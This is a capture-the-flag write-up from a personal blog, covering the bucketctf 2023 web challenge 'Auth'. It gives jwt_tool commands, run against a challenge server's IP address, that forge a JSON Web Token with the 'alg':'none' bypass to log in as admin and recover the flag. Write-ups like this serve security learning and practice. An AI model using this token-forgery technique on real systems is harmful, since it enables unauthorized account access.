7f454c4648656c7
f454,aoooooooa,c464
8656,oY"c6c6f2c"Yo,2077
0100,oY000003003e0Yo,00c0
0000oo0000000000c00oo0000
0c00oo0000 N0X 0000oo0000
0f05oo5f3cf4ff711fboo20e1
400e`obb0638000100do'1500
ff71`obada545e0ado'f05b
0e73"YoooooooY"1ffe
bdf6f726c64210a
[main] [about me] [writeups] Made with ❤ by n0x
Auth @ bucketctf 2023 (web)
------ Description --------------------------------------------------------
> I just started learning about a new authentication method called JWT.
> This is my first website with it, could you check if its secure?
------ TL;DR --------------------------------------------------------------
As the description indicates, we will certainly have to exploit a JWT
vulnerability, on the website there is a '/register' page which allows us
to register and thus be able to have JWT tokens for our account.
However no route accessible by default allows us to provide a JWT token to
the server.
So we just have to find a route or a way to send a JWT token to the server
to be able to try to bypass this authentication.
------ Solution -----------------------------------------------------------
First i ran a gobuster on the website to see if there is a page where we
can provide a JWT token.
The '/info' route lead to a '/validate' route needing a token as a GET
parameter.
We will now try to exploit the JWT token with the jwt_tool
fork of dillonfrank to have a support of GET parameters.
Then i replaced '[0-4]' with '0' and '[5-9]' with '1'.
=== shell =================================================================
~$ python3 jwt_tool.py -M at -t "http://213.133.103.186:6307/validate?" \
-gd "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3Q \
yIiwiaWF0IjoxNjgwOTk2ODgyfQ.2qodlmGmM19ZFZE-aCWb1FyC9YNiHwxrRw2Bu3WX840"\
-I -pc username -pv admin
[...]
jwttool_e0e5c45b9f118f38e4bccbf97821f92e Exploit: "alg":"none" (-X a)
Response Code: 200, 37 bytes
[...]
~$ python3 jwt_tool.py -Q "jwttool_e0e5c45b9f118f38e4bccbf97821f92e"
===========================================================================
We can see that the server return a 200 with a none algorithm, we can just
query the result and we get the flag.
------ Flag ---------------------------------------------------------------
bucket{1_l0v3_jwt!!!1!!!!1!!!!!1111!}
___________________________________________________________________________
[X] [github] [hackthebox] [root-me] [tryhackme] [ctftime]
I also do some photograhy (pcb/die, animals, landscapes, etc).
Feel free to check my Gurushots and Flickr profile